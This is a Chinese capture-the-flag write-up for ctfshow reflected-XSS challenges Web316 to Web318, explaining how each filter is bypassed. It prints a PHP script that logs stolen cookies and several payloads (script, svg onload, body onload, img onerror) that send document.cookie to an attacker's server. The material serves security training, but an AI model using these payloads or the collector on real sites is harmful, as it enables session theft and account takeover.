ctfshow(316,317,318)--XSS漏洞--反射性XSS

反射型XSS相关知识

Web316

进入界面:

审计

显示是关于反射性XSS的题目。

思路

首先想到利用XSS平台解题,看其他师傅的wp提示flag是在cookie中。

当前页面的cookie是flag=you%20are%20not%20admin%20no%20flag。

但是这里我使用XSS平台,显示的cookie还是这样,并不能得到flag。该方法先作罢。

于是我们使用稳定性更高的方法:写js代码将cookie传到自己的服务器上。

先在服务器写一个php文件:

php 复制代码
//flag.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

然后在靶机中传入如下代码:

php 复制代码
<script>location.href="http://[自己服务器的IP]/flag.php?cookie="+document.cookie</script>

提交之后成功跳转到自己的网页。

查看自己服务器中的cookie.txt文件,得到flag。

Web317

界面与上一题相同。

但是过滤了<script>,大小写混写也不能使用。

考虑使用HTML的其他标签。

这道题我们使用<svg>与onload属性

php 复制代码
<svg onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

//svg 是用于绘图的标签
//onload事件 是页面加载成功后执行的事件

得到flag.

其他形式的payload:

php 复制代码
//body标签也支持onload事件
<body onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

//img标签支持onerror属性。当图片加载发生了错误,就会触发该事件
<img src='#' onerror="window.location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

Web318

和上一题相同,不过多过滤了img标签。

使用body或者svg标签即可。

php 复制代码
<body onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

<svg onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

得到flag.

相关推荐
学习溢出4 小时前
【网络安全】理解安全事件的“三分法”流程:应对警报的第一道防线
网络·安全·web安全·网络安全·ids
鹿鸣天涯4 小时前
《红蓝攻防:构建实战化网络安全防御体系》
安全·web安全
Bruce_Liuxiaowei12 小时前
dict协议在网络安全中的应用与风险分析
网络·安全·web安全·伪协议
FreeBuf_13 小时前
蓝牙协议栈高危漏洞曝光,攻击可入侵奔驰、大众和斯柯达车载娱乐系统
安全·web安全·娱乐
浩浩测试一下20 小时前
Windows 与 Linux 内核安全及 Metasploit/LinEnum 在渗透测试中的综合应用
linux·运维·windows·web安全·网络安全·系统安全·安全架构
爱电摇的小码农1 天前
【深度探究系列(5)】:前端开发打怪升级指南:从踩坑到封神的解决方案手册
前端·javascript·css·vue.js·node.js·html5·xss
码农12138号1 天前
BUUCTF在线评测-练习场-WebCTF习题[GYCTF2020]Blacklist1-flag获取、解析
web安全·网络安全·ctf·sql注入·handler·buuctf
mooyuan天天1 天前
DVWA靶场通关笔记-反射型XSS(Reflected Low级别)
xss·反射型xss·xss漏洞·dvwa靶场
花木偶1 天前
【郑大二年级信安小学期】Day9:XSS跨站攻击&XSS绕过&CSRF漏洞&SSRF漏洞
前端·xss
小红卒2 天前
upload-labs靶场通关详解:第21关 数组绕过
web安全·网络安全·文件上传漏洞